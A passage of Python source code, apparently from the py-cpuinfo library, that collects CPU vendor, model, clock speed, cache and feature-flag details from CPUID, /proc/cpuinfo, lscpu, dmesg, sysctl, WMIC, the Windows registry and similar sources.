b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64
return retval
def get_raw_hz(self):
from time import sleep
ticks_fn = self.get_ticks_func()
start = ticks_fn.func()
sleep(1)
end = ticks_fn.func()
ticks = (end - start)
ticks_fn.free()
return ticks
def _get_cpu_info_from_cpuid_actual():
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
if IS_PY2:
from cStringIO import StringIO
else:
from io import StringIO
trace = Trace(True, True)
info = {}
# Pipe stdout and stderr to strings
sys.stdout = trace._stdout
sys.stderr = trace._stderr
try:
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return none if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
trace.fail('Not running on X86_32 or X86_64. Skipping ...')
return trace.to_dict(info, True)
# Return none if SE Linux is in enforcing mode
cpuid = CPUID(trace)
if cpuid.is_selinux_enforcing:
trace.fail('SELinux is enforcing. Skipping ...')
return trace.to_dict(info, True)
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Get the Hz and scale
hz_actual = cpuid.get_raw_hz()
hz_actual = _to_decimal_string(hz_actual)
# Get the Hz and scale
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
info = {
'vendor_id_raw' : cpuid.get_vendor_id(),
'hardware_raw' : '',
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : cache_info['size_b'],
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : cache_info['associativity'],
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = _filter_dict_keys_with_empty_values(info)
trace.success()
except Exception as err:
from traceback import format_exc
err_string = format_exc()
trace._err = ''.join(['\t\t{0}\n'.format(n) for n in err_string.split('\n')]) + '\n'
return trace.to_dict(info, True)
return trace.to_dict(info, False)
def _get_cpu_info_from_cpuid_subprocess_wrapper(queue):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
output = _get_cpu_info_from_cpuid_actual()
sys.stdout = orig_stdout
sys.stderr = orig_stderr
queue.put(_obj_to_b64(output))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
g_trace.header('Tying to get info from CPUID ...')
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
g_trace.fail('Can\'t CPUID. Skipping ...')
return {}
# Get the CPU arch and bits
arch, bits = _parse_arch(DataSource.arch_string_raw)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
g_trace.fail('Not running on X86_32 or X86_64. Skipping ...')
return {}
try:
if CAN_CALL_CPUID_IN_SUBPROCESS:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_get_cpu_info_from_cpuid_subprocess_wrapper, args=(queue,))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
g_trace.fail('Failed to run CPUID in process. Skipping ...')
return {}
# Return {} if no results
if queue.empty():
g_trace.fail('Failed to get anything from CPUID process. Skipping ...')
return {}
# Return the result, only if there is something to read
else:
output = _b64_to_obj(queue.get())
import pprint
pp = pprint.PrettyPrinter(indent=4)
#pp.pprint(output)
if 'output' in output and output['output']:
g_trace.write(output['output'])
if 'stdout' in output and output['stdout']:
sys.stdout.write('{0}\n'.format(output['stdout']))
sys.stdout.flush()
if 'stderr' in output and output['stderr']:
sys.stderr.write('{0}\n'.format(output['stderr']))
sys.stderr.flush()
if 'is_fail' not in output:
g_trace.fail('Failed to get is_fail from CPUID process. Skipping ...')
return {}
# Fail if there was an exception
if 'err' in output and output['err']:
g_trace.fail('Failed to run CPUID in process. Skipping ...')
g_trace.write(output['err'])
g_trace.write('Failed ...')
return {}
if 'is_fail' in output and output['is_fail']:
g_trace.write('Failed ...')
return {}
if 'info' not in output or not output['info']:
g_trace.fail('Failed to get return info from CPUID process. Skipping ...')
return {}
return output['info']
else:
# FIXME: This should write the values like in the above call to actual
orig_stdout = sys.stdout
orig_stderr = sys.stderr
output = _get_cpu_info_from_cpuid_actual()
sys.stdout = orig_stdout
sys.stderr = orig_stderr
g_trace.success()
return output['info']
except Exception as err:
g_trace.fail(err)
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
g_trace.header('Tying to get info from /proc/cpuinfo ...')
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
g_trace.fail('Failed to find /proc/cpuinfo. Skipping ...')
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
g_trace.fail('Failed to run cat /proc/cpuinfo. Skipping ...')
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name', 'cpu', 'processor', 'uarch')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features', 'ASEs implemented')
if flags:
flags = flags.split()
flags.sort()
# Check for other cache format
if not cache_size:
try:
for i in range(0, 10):
name = "cache{0}".format(i)
value = _get_field(False, output, None, None, name)
if value:
value = [entry.split('=') for entry in value.split(' ')]
value = dict(value)
if 'level' in value and value['level'] == '3' and 'size' in value:
cache_size = value['size']
break
except Exception:
pass
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock', 'cpu MHz dynamic', 'cpu MHz static')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = _to_decimal_string(hz_actual)
# Convert from GHz/MHz string to Hz
hz_advertised, scale = (None, 0)
try:
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
except Exception:
pass
info = {
'hardware_raw' : hardware,
'brand_raw' : processor_brand,
'l3_cache_size' : _friendly_bytes_to_int(cache_size),
'flags' : flags,
'vendor_id_raw' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if _hz_short_to_full(hz_advertised, scale) > (0, 0):
info['hz_advertised_friendly'] = _hz_short_to_friendly(hz_advertised, scale)
info['hz_advertised'] = _hz_short_to_full(hz_advertised, scale)
if _hz_short_to_full(hz_actual, scale) > (0, 0):
info['hz_actual_friendly'] = _hz_short_to_friendly(hz_actual, 6)
info['hz_actual'] = _hz_short_to_full(hz_actual, 6)
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
g_trace.header('Tying to get info from cpufreq-info ...')
try:
hz_brand, scale = '0.0', 0
if not DataSource.has_cpufreq_info():
g_trace.fail('Failed to find cpufreq-info. Skipping ...')
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
g_trace.fail('Failed to run cpufreq-info. Skipping ...')
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = _to_decimal_string(hz_brand)
info = {
'hz_advertised_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_brand, scale),
'hz_advertised' : _hz_short_to_full(hz_brand, scale),
'hz_actual' : _hz_short_to_full(hz_brand, scale),
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
g_trace.header('Tying to get info from lscpu ...')
try:
if not DataSource.has_lscpu():
g_trace.fail('Failed to find lscpu. Skipping ...')
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
g_trace.fail('Failed to run lscpu. Skipping ...')
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
new_hz = _get_field(False, output, None, None, 'CPU dynamic MHz', 'CPU static MHz')
if new_hz:
new_hz = _to_decimal_string(new_hz)
scale = 6
info['hz_advertised_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_actual_friendly'] = _hz_short_to_friendly(new_hz, scale)
info['hz_advertised'] = _hz_short_to_full(new_hz, scale)
info['hz_actual'] = _hz_short_to_full(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id_raw'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand_raw'] = brand
else:
brand = _get_field(False, output, None, None, 'Model')
if brand and not brand.isdigit():
info['brand_raw'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = _friendly_bytes_to_int(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = _friendly_bytes_to_int(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache', 'L2d cache')
if l2_cache_size:
info['l2_cache_size'] = _friendly_bytes_to_int(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = _friendly_bytes_to_int(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features', 'ASEs implemented')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
g_trace.header('Tying to get info from the dmesg ...')
# Just return {} if this arch has an unreliable dmesg log
arch, bits = _parse_arch(DataSource.arch_string_raw)
if arch in ['S390X']:
g_trace.fail('Running on S390X. Skipping ...')
return {}
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
g_trace.fail('Failed to find dmesg. Skipping ...')
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"dmesg -a\". Skipping ...')
return {}
info = _parse_dmesg_output(output)
g_trace.success()
return info
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
g_trace.header('Tying to get info from lsprop ...')
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
g_trace.fail('Failed to find lsprop. Skipping ...')
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
g_trace.fail('Failed to glob /proc/device-tree/cpus/*/ibm,pa-features. Skipping ...')
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcfed')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : _is_bit_set(left, 0),
'fpu' : _is_bit_set(left, 1),
'slb' : _is_bit_set(left, 2),
'run' : _is_bit_set(left, 3),
#'reserved' : _is_bit_set(left, 4),
'dabr' : _is_bit_set(left, 5),
'ne' : _is_bit_set(left, 6),
'wtr' : _is_bit_set(left, 7),
# Byte 1
'mcr' : _is_bit_set(left, 8),
'dsisr' : _is_bit_set(left, 9),
'lp' : _is_bit_set(left, 10),
'ri' : _is_bit_set(left, 11),
'dabrx' : _is_bit_set(left, 12),
'sprg3' : _is_bit_set(left, 13),
'rislb' : _is_bit_set(left, 14),
'pp' : _is_bit_set(left, 15),
# Byte 2
'vpm' : _is_bit_set(left, 16),
'dss_2.05' : _is_bit_set(left, 17),
#'reserved' : _is_bit_set(left, 18),
'dar' : _is_bit_set(left, 19),
#'reserved' : _is_bit_set(left, 20),
'ppr' : _is_bit_set(left, 21),
'dss_2.02' : _is_bit_set(left, 22),
'dss_2.06' : _is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : _is_bit_set(left, 24),
'ugr_in_dscr' : _is_bit_set(left, 25),
#'reserved' : _is_bit_set(left, 26),
#'reserved' : _is_bit_set(left, 27),
#'reserved' : _is_bit_set(left, 28),
#'reserved' : _is_bit_set(left, 29),
#'reserved' : _is_bit_set(left, 30),
#'reserved' : _is_bit_set(left, 31),
# Byte 4
'sso_2.06' : _is_bit_set(right, 0),
#'reserved' : _is_bit_set(right, 1),
#'reserved' : _is_bit_set(right, 2),
#'reserved' : _is_bit_set(right, 3),
#'reserved' : _is_bit_set(right, 4),
#'reserved' : _is_bit_set(right, 5),
#'reserved' : _is_bit_set(right, 6),
#'reserved' : _is_bit_set(right, 7),
# Byte 5
'le' : _is_bit_set(right, 8),
'cfar' : _is_bit_set(right, 9),
'eb' : _is_bit_set(right, 10),
'lsq_2.07' : _is_bit_set(right, 11),
#'reserved' : _is_bit_set(right, 12),
#'reserved' : _is_bit_set(right, 13),
#'reserved' : _is_bit_set(right, 14),
#'reserved' : _is_bit_set(right, 15),
# Byte 6
'dss_2.07' : _is_bit_set(right, 16),
#'reserved' : _is_bit_set(right, 17),
#'reserved' : _is_bit_set(right, 18),
#'reserved' : _is_bit_set(right, 19),
#'reserved' : _is_bit_set(right, 20),
#'reserved' : _is_bit_set(right, 21),
#'reserved' : _is_bit_set(right, 22),
#'reserved' : _is_bit_set(right, 23),
# Byte 7
#'reserved' : _is_bit_set(right, 24),
#'reserved' : _is_bit_set(right, 25),
#'reserved' : _is_bit_set(right, 26),
#'reserved' : _is_bit_set(right, 27),
#'reserved' : _is_bit_set(right, 28),
#'reserved' : _is_bit_set(right, 29),
#'reserved' : _is_bit_set(right, 30),
#'reserved' : _is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
g_trace.header('Tying to get info from the /var/run/dmesg.boot log ...')
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
g_trace.fail('Failed to find /var/run/dmesg.boot file. Skipping ...')
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"cat /var/run/dmesg.boot\". Skipping ...')
return {}
info = _parse_dmesg_output(output)
g_trace.success()
return info
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
g_trace.header('Tying to get info from sysctl ...')
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
g_trace.fail('Failed to find sysctl. Skipping ...')
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysctl machdep.cpu hw.cpufrequency\". Skipping ...')
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, int, 0, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 0),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 0),
'l2_cache_size' : int(cache_size) * 1024,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
g_trace.header('Tying to get info from sysinfo version 1 ...')
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
g_trace.fail('Failed to find sysinfo. Skipping ...')
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysinfo -cpu\". Skipping ...')
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
g_trace.header('Tying to get info from sysinfo version 2 ...')
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
g_trace.fail('Failed to find sysinfo. Skipping ...')
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run \"sysinfo -cpu\". Skipping ...')
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0].strip()
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' ') and not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
lines = [n for n in output.split('\n') if n]
raw_hz = lines[0].split('running at ')[1].strip().lower()
hz_advertised = raw_hz.rstrip('mhz').rstrip('ghz').strip()
hz_advertised = _to_decimal_string(hz_advertised)
hz_actual = hz_advertised
scale = 0
if raw_hz.endswith('mhz'):
scale = 6
elif raw_hz.endswith('ghz'):
scale = 9
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, scale),
'l2_cache_size' : _to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
g_trace.header('Tying to get info from wmic ...')
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
g_trace.fail('Failed to find WMIC, or not on Windows. Skipping ...')
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
g_trace.fail('Failed to run wmic. Skipping ...')
return {}
# Break the list into key values pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
hz_advertised, scale_advertised = _parse_cpu_brand_string(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = _to_decimal_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize') # NOTE: L2CacheSize is in kilobytes
if l2_cache_size:
l2_cache_size = int(l2_cache_size) * 1024
l3_cache_size = value.get('L3CacheSize') # NOTE: L3CacheSize is in kilobytes
if l3_cache_size:
l3_cache_size = int(l3_cache_size) * 1024
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id_raw' : value.get('Manufacturer'),
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale_advertised),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, scale_actual),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale_advertised),
'hz_actual' : _hz_short_to_full(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
g_trace.header('Tying to get info from Windows registry ...')
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
g_trace.fail('Not running on Windows. Skipping ...')
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand().strip()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id_raw()
# Get the CPU arch and bits
arch_string_raw = DataSource.winreg_arch_string_raw()
arch, bits = _parse_arch(arch_string_raw)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = _to_decimal_string(hz_actual)
# Get the advertised CPU Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'hz_advertised_friendly' : _hz_short_to_friendly(hz_advertised, scale),
'hz_actual_friendly' : _hz_short_to_friendly(hz_actual, 6),
'hz_advertised' : _hz_short_to_full(hz_advertised, scale),
'hz_actual' : _hz_short_to_full(hz_actual, 6),
'flags' : flags
}
info = _filter_dict_keys_with_empty_values(info)
g_trace.success()
return info
except Exception as err:
g_trace.fail(err)
return {}
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
g_trace.header('Tying to get info from kstat ...')
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
g_trace.fail('Failed to find isinfo or kstat. Skipping ...')
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
g_trace.fail('Failed to run \"isainfo -vb\". Skipping ...')
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
g_trace.fail('Failed to run \"kstat -m cpu_info\". Skipping ...')
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
